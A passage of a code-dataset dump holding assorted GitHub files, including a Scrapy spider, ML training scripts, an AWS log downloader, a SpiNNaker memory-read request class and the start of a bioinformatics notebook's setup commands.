},\n)\n\n\ndef make_request(endpoint, json):\n r = requests.post(\n url=f\"https://discord.com/api/v8/applications/{os.getenv('APPLICATION_ID')}/{endpoint}\",\n headers={\"Authorization\": f\"Bot {os.getenv('BOT_TOKEN')}\"},\n json=json,\n )\n print(f\"{json['name']}:\", r.status_code)\n\n\nif __name__ == \"__main__\":\n slash_color()\n","repo_name":"LeptoFlare/unnamed-color-bot","sub_path":"commands/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43934960845","text":"import scrapy\nfrom MovieRP.items import MovierpItem\n\n\nclass movierpSpider(scrapy.Spider):\n # 爬虫名称\n name = 'movie'\n # 爬虫允许爬取域名\n allowed_domains = ['movie.douban.com']\n # 基础域名\n base_url = 'https://movie.douban.com/subject/11537954/comments'\n # 爬虫起始URL\n start_urls = ['https://movie.douban.com/subject/11537954/comments?status=P']\n # 爬虫页数控制初始值\n count = 1\n # 爬虫爬取页数\n spider_end = 3\n\n def parse(self, response):\n\n item = MovierpItem()\n\n # 下一页地址\n nextPage = self.base_url + response.xpath(\"//div[@id='paginator']/a[@class='next']/@href\").extract()[0]\n\n # 提取短评信息\n node_list = response.xpath('//div[@class=\"comment\"]')\n for node in node_list:\n item['name'] = node.xpath('./h3/span[@class=\"comment-info\"]/a/text()').extract()[0]\n item['content'] = node.xpath('./p/span[@class=\"short\"]/text()').extract()[0]\n yield item\n\n\n # 爬虫页数控制及末页控制\n if self.count < self.spider_end:\n # 爬虫页数控制自增 \n self.count = self.count + 1\n\n # 爬取下一页\n yield scrapy.Request(nextPage, callback=self.parse)\n else:\n # 爬虫退出\n return None","repo_name":"ravenwritingdesk/scrapy_spider","sub_path":"MovieRP/spiders/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16709435872","text":"import unittest\nfrom location import *\n\nclass TestLab1(unittest.TestCase):\n\n def test_repr(self):\n loc = Location(\"SLO\", 35.3, -120.7)\n self.assertEqual(repr(loc),\"Location('SLO', 35.3, -120.7)\")\n\n # Add more tests!\n\n def test_eq_diff_latlon(self):\n \"\"\"testing the eq to make sure that, with different latitudes and the same \n longitudes and vice versa, the locations will not be equal\"\"\"\n loc1 = Location(\"SLO\", 45.7, -40.2)\n loc2 = Location(\"SLO\", 45.7, 0.0)\n loc3 = Location(\"SLO\", 60.2, -40.2)\n loc4 = Location(\"SLO\", 45.7, -40.2)\n self.assertNotEqual(loc1, loc2)\n self.assertEqual(loc1, loc4)\n self.assertNotEqual(loc3, loc4)\n\n\n def test_eq_diff_loc(self):\n \"\"\"test having the same latitute and longitudes at different locations\"\"\"\n loc1 = Location(\"Shingle Springs\", 20.0, 47.9)\n loc2 = Location(\"Pismo\", 20.0, 47.9)\n loc3 = Location(\"SLO\", 20.0, 47.9)\n loc4 = Location(\"SLO\", 20.0, 47.9)\n self.assertNotEqual(loc1, loc4)\n self.assertNotEqual(loc2, loc4)\n self.assertEqual(loc3, loc4)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cpe202fall2019/lab1-srietkerk","sub_path":"location_tests.py","file_name":"location_tests.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71045343432","text":"# File: \t\tkeyphrase_extractor.py \tv1.0 \t09/07/2021\n# Author:\t\tGerman Garcia Garcia\tgggsman@gmail.com\n# Description:\tThe following script is an automatic terminology or keyphrase extractor that given a text\n#\t\t\t\tinput returns the text itself with the keywords on it highlighted and a list of them,\n#\t\t\t\tthe model has been trained using the system provided in the following github repository.\n# Github:\t\thttps://github.com/3Gsman/DeepTerminologyExtraction\n\nimport sys\nimport os\n\ntry:\n\tfrom flair.models import SequenceTagger\n\tfrom flair.data import Sentence\nexcept:\n\tprint(\"ERROR: 'FLAIR' libray not found, please write the command 'pip3 install flair'. \")\n\n# Files loading\nif not os.path.isfile('model.pt'):\n\tprint(\"ERROR: 'model.pt' does not exist, please follow the instructions in README.txt to download the model.\")\n\tsys.exit()\n\ntry:\n\twith open('input.txt') as f:\n\t\tlines = f.readlines()\nexcept IOError:\n\tprint(\"ERROR: 'input.txt' file does not exist. Please create the file in this directory.\")\n\tsys.exit()\n\nmodel = SequenceTagger.load('model.pt')\t\n\ntry:\n\tsentence = Sentence(lines[0])\nexcept:\n\tprint(\"ERROR: 'input.txt' file empty. Please intruduce the text in 'input.txt'.\")\n\tsys.exit()\n\n# Tag preddiction\nmodel.predict(sentence)\n\nlabeled = sentence.to_tagged_string()\n\n# Output processing\nwordList = labeled.split()\n\nit2 = -1\nkeywords = []\nfor i in range(len(wordList)):\n\tif wordList[i] == \"\":\n\t\ttemp = []\n\t\ttemp.append(wordList[i-1])\n\t\tkeywords.append(temp)\n\n\telif wordList[i] == \"\":\n\t\ttemp.append(wordList[i-1])\n\t\tkeywords.append(temp)\n\nstr_keyword = []\nfor item in keywords:\n\tstr_keyword.append(' '.join(item))\n\nstr_keyword = list(set(str_keyword))\n\ntemp2 = [\"ORIGINAL TEXT\",lines[0],\"\",\"TEXT WITH TAGS\",labeled,\"\",\"KEYWORDS\"]\n\ntotxt = temp2 + str_keyword\n\nwith open('output.txt', 'w') as f:\n for item in totxt:\n f.write(\"%s\\n\" % item)\n\nprint(\"__________ Script execution completed __________\")","repo_name":"3Gsman/DeepTerminologyExtraction","sub_path":"keyphrase_extractor/keyphrase_extractor.py","file_name":"keyphrase_extractor.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12447795306","text":"\"\"\"Module for train main model\"\"\"\n\nimport json\nimport warnings\nimport pkg_resources\nimport pandas as pd\nimport click\nfrom xgboost import XGBClassifier\nimport joblib\nimport mlflow\nfrom mlflow.models.signature import infer_signature\nfrom src.models.predict_model import predict_model\nfrom src.models.evaluate import evaluate\nfrom src.common_funcs import mlflow_set_tracking_config\n\nwarnings.filterwarnings(\"ignore\")\n\nmlflow_set_tracking_config(\"mlops23regproject\")\n\n\n@click.command()\n@click.argument(\"input_pair_features_train_dataset_path\", type=click.Path(exists=True))\n@click.argument(\"input_pair_features_test_dataset_path\", type=click.Path(exists=True))\n@click.argument(\"input_original_test_dataset_path\", type=click.Path(exists=True))\n@click.argument(\"input_pair_test_metrics_path\", type=click.Path(exists=True))\n@click.argument(\"output_model_path\", type=click.Path())\n@click.argument(\"output_submission_path\", type=click.Path())\n@click.argument(\"output_metrics_path\", type=click.Path())\ndef train_model( # pylint: disable=too-many-arguments,too-many-locals\n input_pair_features_train_dataset_path: str,\n input_pair_features_test_dataset_path: str,\n input_original_test_dataset_path: str,\n input_pair_test_metrics_path: str,\n output_model_path: str,\n output_submission_path: str,\n output_metrics_path: str,\n) -> None:\n \"\"\"Функция тренировки основной модели бинарной классификиции на основе датасета\n пар-кандидатов, включающая в себя формирование csv файл предсказаний (на основе\n отложенной вы��орки), в формате submission, который требуется в рамках соревнования,\n а так же генерацию метрик модели.\n Дополнительно осуществляется трекинг (посредством mlflow):\n - всех параметров модели,\n - метрик модели,\n - самой модели.\n\n Args:\n input_pair_features_train_dataset_path (str): Путь к файлу csv датасета пар-кандидатов,\n используемого для обучения.\n input_pair_features_test_dataset_path (str): Путь к файлу csv датасета пар-кандидатов,\n полученного на основе файла отложенной выборки).\n input_original_test_dataset_path (str): Путь к csv файлу датасета отложенной выборки,\n исходного формата (обычно split_test), по факту в нем нужна только колонка [\"id\"]\n input_pair_test_metrics_path (str): Путь к файлу метрик, который был сгенерирован на стадии\n формирования парного датасета отложенной выборки, для более наглядного трекинга\n экспериментов и формирования дополнительных метрик конечной модели.\n output_model_path (str): Путь для сохранения обученной модели. Модель сохраняется\n через joblib.dump, для дальнейшей загрузки используем joblib.load.\n output_submission_path (str): Путь для сохранения выходного файла submission pred (.csv),\n полученного на основе отложенной выборки.\n output_metrics_path (str): Путь до выходного json файла метрик модели.\n \"\"\"\n\n # with mlflow.start_run(run_name=\"test_run\") as mlflow_run:\n pair_features_train_df = pd.read_csv(input_pair_features_train_dataset_path)\n\n # Формируем X, y для дальнейшей передачи в модель\n y_true = pair_features_train_df[\"target_label\"] # type: ignore\n\n # Все колонки фичей начинаются с 'ftr_'\n columns_to_remove = [\n col for col in pair_features_train_df.columns if not col.startswith(\"ftr_\") # type: ignore\n ]\n # Для экономии памяти (исключения возможности дублирования) используем inplace\n pair_features_train_df.drop(columns=columns_to_remove, inplace=True) # type: ignore\n X_features = pair_features_train_df # pylint: disable=C0103\n\n # Model params\n model_params = {\"random_state\": 42, \"n_estimators\": 10, \"verbosity\": 0}\n\n # Define the model\n model = XGBClassifier(**model_params)\n\n # Fit the model\n model.fit(X_features, y_true)\n\n joblib.dump(model, output_model_path)\n\n # Подчищаем память после тренировки модели\n del pair_features_train_df, y_true\n # Оставляем только 2 строки от X_features, далее потребуется для формирования signature,\n # необходимой для трекинга модели в mfflow\n X_features = X_features.iloc[:2] # pylint: disable=C0103\n y_pred = model.predict(X_features)\n\n # Mlflow tracking model and model params\n mlflow.log_params(model_params)\n\n project_ver = pkg_resources.get_distribution(\"mlops23regproject\").version\n signature = infer_signature(X_features, y_pred) # inputs, outputs\n mlflow.xgboost.log_model(\n model,\n artifact_path=\"output_model_path\",\n registered_model_name=f\"general_model_v{project_ver}\",\n signature=signature,\n )\n\n # Подчищаем память\n del model, X_features, y_pred\n\n # Predict model on test dataset and save output_submission csv\n predict_model(\n output_model_path,\n input_original_test_dataset_path,\n input_pair_features_test_dataset_path,\n output_submission_path,\n )\n\n metrics_final = evaluate(\n input_original_test_dataset_path,\n output_submission_path,\n output_metrics_path,\n return_metrics=True,\n )\n\n with open(input_pair_test_metrics_path, encoding=\"UTF-8\") as json_file:\n metrics_pairs = json.load(json_file)\n\n # Mlflow tracking experiment metrics\n mlflow.log_metrics(metrics_pairs)\n mlflow.log_metrics(metrics_final)\n\n\nif __name__ == \"__main__\":\n train_model() # pylint: disable=E1120\n","repo_name":"wisoffe/mlops-23reg-project","sub_path":"src/models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43722948575","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nclass LogisticRegression(object):\r\n def __init__(self, W_size, n_iter=30, alpha=0.01):\r\n \"\"\"\r\n 对数几率回归(逻辑回归)的初始化函数\r\n 迭代次数和学习率初始化为30和0.01,实例化逻辑回归时可以传参修改\r\n :param W_size: 参数W的维度,这里的 W 其实是包含了 W 和 b\r\n :param n_iter: 迭代次数\r\n :param alpha: 学习率\r\n \"\"\"\r\n # 迭代次数\r\n self.n_iter = n_iter\r\n # 学习率\r\n self.alpha = alpha\r\n # 系数W\r\n self.W = np.zeros(W_size)\r\n\r\n @staticmethod\r\n def sigmoid(z):\r\n \"\"\"sigmoid函数\"\"\"\r\n return 1 / (1 + np.exp(-z))\r\n\r\n def y_hat_function(self, X):\r\n \"\"\"求y_hat的函数\"\"\"\r\n z = np.matmul(X, self.W)\r\n y_hat = self.sigmoid(z)\r\n return y_hat\r\n\r\n def costFunction(self, X, y):\r\n \"\"\"损失函数\"\"\"\r\n # 求出y_hat\r\n y_hat = self.y_hat_function(X)\r\n # size为样本的个数\r\n size = y.shape[0]\r\n # 将y_hat代入公式,求出损失\r\n cost = np.sum(-y * np.log(y_hat) - (1 - y) * np.log(1 - y_hat)) / size\r\n return cost\r\n\r\n def gradient(self, X, y):\r\n \"\"\"计算梯度\"\"\"\r\n # 求出y_hat\r\n y_hat = self.y_hat_function(X)\r\n # size为样本的个数\r\n size = y.shape[0]\r\n # 求解出损失函数对W的偏导\r\n dW = np.matmul(X.T, (y_hat - y)) / size\r\n return dW\r\n\r\n def BGD(self, X, y):\r\n \"\"\"\r\n 批量梯度下降\r\n :param X: 样本X\r\n :param y: 真实值y\r\n :return: 预测值y_pre,损失的集合cost_data,迭代次数\r\n \"\"\"\r\n # 传入的X和y其实已经是array类型\r\n # 因为在主函数中做数据做处理时已经将转X和y换成为了array类型\r\n # 这里对X和y再次转化array类型是为了再次确认并提高函数的通用性\r\n X = np.array(X)\r\n y = np.array(y)\r\n\r\n # 将W初始为全0的向量,并且多加了一维数据,用来表示b\r\n self.W = np.zeros(X.shape[1]) * self.W\r\n\r\n # 创建一个列表存放计算出来的cost,用于之后的画图\r\n cost_data = []\r\n\r\n # 这里的迭代次数加一是为了能打印更多的迭代信息\r\n # 比如:设置n_iter为20的时候是range(21),实际迭代了0到20共二十一次\r\n # 此时便能打印出第20次的迭代信息\r\n for i in range(self.n_iter + 1):\r\n # 计算梯度并对W进行迭代\r\n dW = self.gradient(X, y)\r\n self.W = self.W - self.alpha * dW\r\n # 计算cost并添加到cost_data列表当中\r\n cost = self.costFunction(X, y)\r\n cost_data.append(cost)\r\n # 每10次计算一次cost并打印一次信息\r\n # if i % 10 == 0:\r\n # print(f'第{i}次迭代:\\t损失是:{cost:.5f},\\tW与b是(前四列是W,第五列是b):{self.W}')\r\n\r\n # 注释了上面每十次打印一次信息,改为只在最后打印一次,这样节省空间\r\n print(f'第{i}次迭代:\\t损失是:{cost:.5f},\\tW与b是(前四列是W,第五列是b):{self.W}')\r\n # 先算出y_hat,再将y_hat进行分类,大于0.5的为1,小于0.5的为0\r\n y_hat = self.y_hat_function(X)\r\n y_pre = np.where(y_hat >= 0.5, 1, 0)\r\n # 返回值cost_data和n_iter是之后绘图所需的参数\r\n return y_pre, cost_data, self.n_iter + 1\r\n\r\n @staticmethod\r\n def probability(y_pre, y):\r\n \"\"\"\r\n :param y_pre: 预测值\r\n :param y: 真实值\r\n :return: 模型预测正确率\r\n \"\"\"\r\n # 传入的y_pre是列表,要转换成array\r\n y_pre = np.array(y_pre)\r\n pro = 1 - np.sum(np.abs(y_pre - y)) / y.shape[0]\r\n return pro * 100\r\n\r\n\r\ndef stratifiedSample(data, ratio):\r\n \"\"\"分层抽样函数\"\"\"\r\n # 把数据集一分为二\r\n # 前一半是第一种鸢尾花,后一半是第二种鸢尾花\r\n data_1 = data.iloc[0:data.shape[0] // 2]\r\n data_2 = data.iloc[data.shape[0] // 2:data.shape[0]]\r\n\r\n # sample frac:按百分比随机抽样 replace:false为不放回的抽样\r\n train_data_1 = data_1.sample(frac=ratio, replace=False)\r\n train_data_2 = data_2.sample(frac=ratio, replace=False)\r\n\r\n # 获取抽取出的样本对应的索引值\r\n train_data_1_index = train_data_1.index.to_list()\r\n train_data_2_index = train_data_2.index.to_list()\r\n\r\n # 将训练样本的索引值进行拼接\r\n train_data_index = train_data_1_index + train_data_2_index\r\n\r\n # 根据索引分割出训练样本与测试样本\r\n train_data = data[data.index.isin(train_data_index)]\r\n test_data = data[~data.index.isin(train_data_index)]\r\n\r\n # 将样本拼接,此时样本的前半部分为训练集,后半部分即为测试集\r\n data = pd.concat([train_data, test_data], axis=0)\r\n return data\r\n\r\n\r\ndef visualization(x, y):\r\n \"\"\"损失函数可视化函数\"\"\"\r\n plt.figure(figsize=(8, 4), dpi=100)\r\n plt.grid(True, linestyle='--', alpha=0.8)\r\n plt.xlabel(\"迭代次数\", fontdict={'size': 14})\r\n plt.ylabel(\"损失\", fontdict={'size': 14})\r\n plt.title(\"损失函数图\")\r\n plt.ylim(0, 0.7)\r\n plt.subplots_adjust(left=0.1, right=0.9, top=0.9, bottom=0.13)\r\n plt.plot(x, y, linewidth=2.5, label=\"cost\")\r\n plt.legend(loc=0)\r\n # 保存图像要在plt.show()之前,要不然保存为空白图片\r\n plt.savefig(\"./picture/cost_picture.png\")\r\n plt.show()\r\n","repo_name":"GeniusAng/LogisticRegression","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":5655,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"10294899538","text":"import argparse\r\nimport json\r\nimport os\r\n\r\nfrom tqdm import tqdm\r\n\r\nimport utils\r\n\r\n\r\ndef log_streams_of_a_group(client, group_name):\r\n response = client.describe_log_streams(\r\n logGroupName=group_name,\r\n orderBy='LastEventTime',\r\n descending=True,\r\n )\r\n streams = [i['logStreamName'] for i in response['logStreams']]\r\n while 'nextToken' in response:\r\n response = client.describe_log_streams(\r\n logGroupName=group_name,\r\n orderBy='LastEventTime',\r\n descending=True,\r\n nextToken=response['nextToken'],\r\n )\r\n try:\r\n if response['ResponseMetadata']['HTTPStatusCode'] == 200:\r\n pass\r\n except KeyError:\r\n print(response)\r\n raise AssertionError('Failed to fetch log streams.')\r\n streams.extend([i['logStreamName'] for i in response['logStreams']])\r\n \r\n return streams\r\n\r\n\r\ndef log_events_of_a_stream(client, group_name, stream_name):\r\n response = client.get_log_events(\r\n logGroupName=group_name,\r\n logStreamName=stream_name,\r\n )\r\n events = response['events']\r\n while 'nextForwardToken' in response:\r\n response = client.get_log_events(\r\n logGroupName=group_name,\r\n logStreamName=stream_name,\r\n nextToken=response['nextForwardToken'],\r\n )\r\n if not response['events']:\r\n break\r\n try:\r\n if response['ResponseMetadata']['HTTPStatusCode'] == 200:\r\n pass\r\n except KeyError:\r\n print(response)\r\n raise AssertionError('Failed to fetch log events.')\r\n events.extend(response['events'])\r\n \r\n return events\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-f', '--force_all', help='force download all log streams even if output_dir is provided', action='store_true')\r\nparser.add_argument('-g', '--group', help='name of the group (e.g., lambda function) for which logs are to be fetched')\r\nparser.add_argument('-o', '--output_dir', help='output folder for logs')\r\nparser.add_argument('-p', '--prefix', help='prefix for the group name (default: /aws/lambda/)')\r\nparser.add_argument('-d', '--delete', help='delete log stream after downloading it', action='store_true')\r\nparser.add_argument('-b', '--beautify', help='store JSON with indentation', action='store_true')\r\nargs = parser.parse_args()\r\n\r\nif args.output_dir:\r\n output_dir = os.path.abspath(args.output_dir.replace('\"', ''))\r\nelse:\r\n output_dir = 'Logs'\r\n\r\nos.makedirs(output_dir, exist_ok=True)\r\nalready_downloaded = os.listdir(output_dir)\r\n\r\nclient = utils.aws_client('logs')\r\n\r\nif args.group:\r\n prefix = args.prefix or '/aws/lambda/'\r\n group_name = prefix + args.group\r\nelse:\r\n log_groups = client.describe_log_groups()\r\n group_name = log_groups['logGroups'][0]['logGroupName']\r\n\r\nif args.beautify:\r\n output_indent = 4\r\nelse:\r\n output_indent = None\r\n\r\nlog_streams = log_streams_of_a_group(client, group_name)\r\nfor stream_name in tqdm(log_streams):\r\n file_name = stream_name.replace('/', '-') + '.log'\r\n \r\n if args.force_all or file_name not in already_downloaded:\r\n events = log_events_of_a_stream(client, group_name, stream_name)\r\n with open(os.path.join(output_dir, file_name), 'w') as fw:\r\n json.dump(events, fw, indent=output_indent)\r\n \r\n if args.delete:\r\n client.delete_log_stream(\r\n logGroupName=group_name,\r\n logStreamName=stream_name,\r\n )\r\n","repo_name":"mahesh01010011/Lambda-Tools","sub_path":"download_logs.py","file_name":"download_logs.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2176307333","text":"class CajeroAutomatico:\r\n def __init__(self):\r\n self.saldo = 1000 \r\n\r\n def realizarRetiro(self, monto):\r\n if self.saldo >= monto:\r\n self.saldo -= monto\r\n print(f\"Retiro de {monto} realizado. Nuevo saldo: {self.saldo}\")\r\n else:\r\n print(\"Fondos insuficientes.\")\r\n\r\n\r\ncajero = CajeroAutomatico()\r\nmonto_retiro = float(input(\"Ingrese el monto que desea retirar: \"))\r\ncajero.realizarRetiro(monto_retiro)\r\n","repo_name":"AlexRD30/algoritmo-paralelo","sub_path":"practica/cajero.py","file_name":"cajero.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"20653524505","text":"# coding=utf-8\nfrom typing import List\n\nfrom deap import creator\n\nfrom algorithms.standard import Standard\nfrom dependency_injection.required_feature import RequiredFeature\nfrom generation.individual import Individual\nfrom util import logger\n\n\nclass Monotonic(Standard):\n \"\"\"Implements the Monotonic Evolutionary Algorithm as described in [CamposGFEA17]_.\n\n The Monotonic version of the Standard GA only includes either the best offspring or the best parent in the next\n population (whereas the Standard GA includes both offspring in the next population regardless of their fitness\n value).\n\n .. [CamposGFEA17] J. Campos, Y. Ge, G. Fraser, M. Eler, and A. Arcuri,\n “An Empirical Evaluation of Evolutionary Algorithms for Test Suite Generation”,\n in Search Based Software Engineering, 2017, pp. 33–48.\n \"\"\"\n\n def __init__(self) -> None:\n super(Monotonic, self).__init__()\n\n def evolve(self) -> List[Individual]:\n verbose_level: bool = RequiredFeature('verbose_level').request()\n\n for gen in range(1, self.max_generations):\n\n if not self.budget_manager.is_budget_available():\n print(\"Budget ran out, exiting evolve\")\n break\n\n logger.log_progress(f\"\\n---> Starting generation {str(gen)}\"\n f\" at {str(self.budget_manager.get_time_budget_used())}\")\n\n # create new population, starting with elitism\n new_population: List[Individual] = self.toolbox.selectBest(self.population, self.elitism_size)\n while len(new_population) < self.population_size:\n # select parents\n parents: List[Individual] = self.toolbox.select(self.population, 2)\n\n # generate offspring\n needed_offspring = min(self.population_size - len(new_population), 2)\n offspring: List[Individual] = self.crossover(parents, gen, needed_offspring,\n base_index_in_generation=len(new_population))\n self.mutation(offspring)\n\n success = self.parallel_evaluator.evaluate(offspring)\n if not success:\n print(\"Budget ran out during parallel evaluation, exiting evolve\")\n return self.population\n\n # extend new population with offspring or parents, depending which ones have the best individual\n best_ind, = self.toolbox.selectBest(offspring + parents, 1)\n if best_ind in offspring:\n new_population.extend(offspring)\n else:\n new_population.extend(parents)\n\n self.population = new_population.copy()\n\n self.parallel_evaluator.test_suite_evaluator.update_logbook(gen, self.population)\n\n if verbose_level > 0:\n logger.log_progress(f\"\\nFinished generation {str(gen)} \"\n f\"at {str(self.budget_manager.get_time_budget_used())}\")\n\n return self.population\n","repo_name":"FlyingPumba/evolutiz","sub_path":"algorithms/monotonic.py","file_name":"monotonic.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"45450280669","text":"# Problem Statement\n#\n\n\nfrom trees import LinkedBinaryTree, BuildLinkedBinaryTree\nfrom trees.utils import Traversal\n\n\ndef get_bt_inorder_predecessor(binary_tree: LinkedBinaryTree, node: LinkedBinaryTree.BinaryTreeNode = None, node_data=None):\n def get_max_left_subtree_node(current_node):\n while binary_tree.right(current_node):\n current_node = binary_tree.right(current_node)\n return current_node\n\n def get_bt_inorder_predecessor_from_key():\n given_node_right_ancestor = None\n\n def _get_bt_inorder_predecessor_from_key(current_node):\n nonlocal given_node_right_ancestor\n\n if node_data == current_node.data:\n if binary_tree.left(current_node):\n given_node_right_ancestor = get_max_left_subtree_node(binary_tree.left(current_node))\n return True\n\n if binary_tree.right(current_node):\n if _get_bt_inorder_predecessor_from_key(binary_tree.right(current_node)):\n if not given_node_right_ancestor:\n given_node_right_ancestor = current_node\n return True\n\n if binary_tree.left(current_node):\n if _get_bt_inorder_predecessor_from_key(binary_tree.left(current_node)):\n return True\n\n return False\n _get_bt_inorder_predecessor_from_key(binary_tree.root())\n return given_node_right_ancestor\n\n given_node = node\n assert given_node or node_data, 'Either of Node or Node-data must be provided'\n\n if given_node and binary_tree.left(given_node):\n return get_max_left_subtree_node(binary_tree.left(given_node))\n\n return get_bt_inorder_predecessor_from_key()\n\n\n# driver code\ndef run():\n binary_tree = BuildLinkedBinaryTree(auto_populate=True, list_of_nodes=[60, 70, 80, 90, 100]).get_tree()\n node_data = 60\n inorder_predecessor_node = get_bt_inorder_predecessor(binary_tree, node_data=node_data)\n\n Traversal(binary_tree).print_inorder_traversal()\n # Traversal(binary_tree).print_level_order_traversal()\n if inorder_predecessor_node:\n print(f'In-order predecessor of the node({node_data}): ', inorder_predecessor_node.data)\n else:\n print(f'In order predecessor of given node({node_data}) doesn\\'t exists')\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"veerat-beri/dsalgo","sub_path":"trees/utils/inorder_predecessor_bt.py","file_name":"inorder_predecessor_bt.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"15024435795","text":"#############\r\n'''\r\nf = open(file_name)\r\ntotal = 0\r\nfor line in f:\r\n if \"apple\" in line:\r\n total += 1\r\nf.close()\r\nprint total\r\n'''\r\n#############\r\ndtprnt = 'What word are we searching for?'\r\nmatra = 'The total number of '\r\nisx = ' is '\r\nwarnuser = 'If you did not find what you are looking for,\\n remember that this is case sensitive.'\r\noki = 'ok'\r\nfnprint = 'CURRENTLY NONOPERATIONAL: What file would you like to open?'\r\n#############\r\n\r\n\r\n\r\nprint (dtprnt)\r\ndatas = input()\r\nprint = (oki)\r\nprint =(fnprint)\r\nfn = input()\r\nprint (oki)\r\n\r\n#############\r\nf = open(\"ex20150609.log\", \"r\")\r\nwcount = 0\r\nfor line in f:\r\n if datas in line:\r\n wcount += 1\r\nf.close()\r\nprint (matra + datas+ isx, wcount)\r\nprint (warnuser)\r\n","repo_name":"phastings1/TextCounter","sub_path":"Xxyxxx.py","file_name":"Xxyxxx.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3468354685","text":"from spinn_utilities.overrides import overrides\nfrom spinn_utilities.typing.coords import XYP\nfrom spinnman.messages.scp import SCPRequestHeader\nfrom spinnman.messages.scp.abstract_messages import (\n AbstractSCPRequest, AbstractSCPResponse)\nfrom spinnman.messages.scp.enums import SCPCommand, SCPResult\nfrom spinnman.messages.sdp import SDPFlag, SDPHeader\nfrom spinnman.exceptions import SpinnmanUnexpectedResponseCodeException\nfrom spinnman.constants import address_length_dtype\n\n\nclass Response(AbstractSCPResponse):\n \"\"\"\n An SCP response to a request to read a region of memory on a chip.\n \"\"\"\n __slots__ = (\n \"_data\",\n \"_length\",\n \"_offset\",\n \"__op\",\n \"__cmd\")\n\n def __init__(self, operation: str, command: str) -> None:\n super().__init__()\n self._data = b''\n self._length = 0\n self._offset = 0\n self.__op = operation\n self.__cmd = command\n\n @overrides(AbstractSCPResponse.read_data_bytestring)\n def read_data_bytestring(self, data: bytes, offset: int):\n assert self._scp_response_header is not None\n if self._scp_response_header.result != SCPResult.RC_OK:\n raise SpinnmanUnexpectedResponseCodeException(\n self.__op, self.__cmd, self._scp_response_header.result)\n self._data = data\n self._offset = offset\n self._length = len(data) - offset\n\n @property\n def data(self) -> bytes:\n \"\"\"\n The data read.\n\n .. note::\n The data starts at offset.\n\n :rtype: bytearray\n \"\"\"\n return self._data\n\n @property\n def offset(self) -> int:\n \"\"\"\n The offset where the valid data starts.\n\n :rtype: int\n \"\"\"\n return self._offset\n\n @property\n def length(self) -> int:\n \"\"\"\n The length of the valid data.\n\n :rtype: int\n \"\"\"\n return self._length\n\n\nclass ReadMemory(AbstractSCPRequest[Response]):\n \"\"\"\n An SCP request to read a region of memory on a chip.\n \"\"\"\n __slots__ = ()\n\n def __init__(self, coordinates: XYP, base_address: int, size: int):\n \"\"\"\n :param tuple coordinates:\n The X,Y,P coordinates of the chip to read from;\n X and Y between 0 and 255, P between 0 and 17\n :param int base_address:\n The positive base address to start the read from\n :param int size: The number of bytes to read, between 1 and 256\n :raise SpinnmanInvalidParameterException:\n * If the chip coordinates are out of range\n * If the base address is not a positive number\n * If the size is out of range\n \"\"\"\n x, y, cpu = coordinates\n super().__init__(\n SDPHeader(\n flags=SDPFlag.REPLY_EXPECTED, destination_port=0,\n destination_cpu=cpu, destination_chip_x=x,\n destination_chip_y=y),\n SCPRequestHeader(command=SCPCommand.CMD_READ),\n argument_1=base_address, argument_2=size,\n argument_3=address_length_dtype[\n (base_address % 4, size % 4)].value)\n\n @overrides(AbstractSCPRequest.get_scp_response)\n def get_scp_response(self) -> Response:\n return Response(\"read memory\", \"CMD_READ\")\n","repo_name":"SpiNNakerManchester/SpiNNMan","sub_path":"spinnman/messages/scp/impl/read_memory.py","file_name":"read_memory.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"22"} +{"seq_id":"72956427255","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nget_ipython().system('wget https://www.tbi.univie.ac.at/RNA/download/ubuntu/ubuntu_18_04/viennarna_2.4.15-1_amd64.deb')\nget_ipython().system('apt-get install ./viennarna_2.4.15-1_amd64.deb -y')\nget_ipython().system('git clone https://github.com/DasLab/arnie')\n\nget_ipython().system('/opt/conda/bin/python3.7 -m pip install --upgrade pip')\nget_ipython().system('git clone https://www.github.com/DasLab/draw_rna draw_rna_pkg')\nget_ipython().system('cd draw_rna_pkg && python setup.py install')\n\nget_ipython().system(\"yes '' | cpan -i Graph\")\nget_ipython().system('git clone https://github.com/hendrixlab/bpRNA')\n\n\n\n\nimport os\nimport sys\n\nget_ipython().system('echo \"vienna_2: /usr/bin\" > arnie.conf')\nget_ipython().system('echo \"TMP: /kaggle/working/tmp\" >> arnie.conf')\nget_ipython().system('mkdir -p /kaggle/working/tmp')\nos.environ[\"ARNIEFILE\"] = 